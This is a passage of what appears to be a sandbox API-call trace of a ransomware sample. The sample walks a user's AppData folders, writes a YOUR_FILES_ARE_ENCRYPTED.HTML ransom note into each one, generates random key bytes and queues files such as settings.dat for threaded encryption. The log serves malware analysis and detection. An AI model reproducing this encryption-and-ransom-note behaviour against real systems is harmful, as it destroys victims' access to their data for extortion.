(in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState" [0116.668] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState\\*" [0116.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.668] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.668] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.668] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.668] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.668] GetProcessHeap () returned 0x600000 [0116.668] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.669] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.670] CloseHandle (hObject=0x320) returned 1 [0116.670] GetProcessHeap () returned 0x600000 [0116.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.670] GetProcessHeap () returned 0x600000 [0116.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.670] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.670] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.670] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState") returned 110 [0116.670] GetProcessHeap () returned 0x600000 [0116.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.670] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState" [0116.670] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState\\*" [0116.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.671] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.671] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.671] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.671] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.671] GetProcessHeap () returned 0x600000 [0116.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.671] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.673] CloseHandle (hObject=0x320) returned 1 [0116.673] GetProcessHeap () returned 0x600000 [0116.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.673] GetProcessHeap () returned 0x600000 [0116.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.674] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.674] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.674] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings") returned 106 [0116.674] GetProcessHeap () returned 0x600000 [0116.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.675] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings" [0116.675] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\*" [0116.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.676] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.676] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.676] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.676] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 119 [0116.676] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.676] lstrlenW (lpString=".lock") returned 5 [0116.676] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.676] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ebddfa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.676] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.676] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat") returned 119 [0116.676] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.676] lstrlenW (lpString=".dat") returned 4 [0116.676] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.676] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0116.677] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.677] GetProcessHeap () returned 0x600000 [0116.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.679] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="8E") returned 2 [0116.679] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="93") returned 2 [0116.679] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="05") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="73") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="65") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="1D") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8A") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="34") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1F") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="4D") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="00") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="FD") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="8C") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="94") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="40") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C1") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="13") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="14") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="3D") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="34") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F6") returned 2 [0116.680] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9F") returned 2 [0116.680] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1E") returned 2 [0116.680] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="63") returned 2 [0116.680] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="20") returned 2 [0116.680] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="51") returned 2 [0116.680] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="81") returned 2 [0116.680] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="1C") returned 2 [0116.680] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F8") returned 2 [0116.680] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="73") returned 2 [0116.680] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="AB") returned 2 [0116.680] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="28") returned 2 [0116.681] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.681] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.681] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.681] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.681] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 124 [0116.681] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.681] lstrlenW (lpString=".LOG1") returned 5 [0116.681] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.681] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.681] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 124 [0116.681] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.681] lstrlenW (lpString=".LOG2") returned 5 [0116.681] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.681] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.681] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.681] GetProcessHeap () returned 0x600000 [0116.681] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.682] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.683] CloseHandle (hObject=0x320) returned 1 [0116.683] GetProcessHeap () returned 0x600000 [0116.683] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.683] GetProcessHeap () returned 0x600000 [0116.683] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.684] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.684] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.684] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData") returned 111 [0116.684] GetProcessHeap () returned 0x600000 [0116.684] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.685] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData" [0116.685] lstrcatW (in: 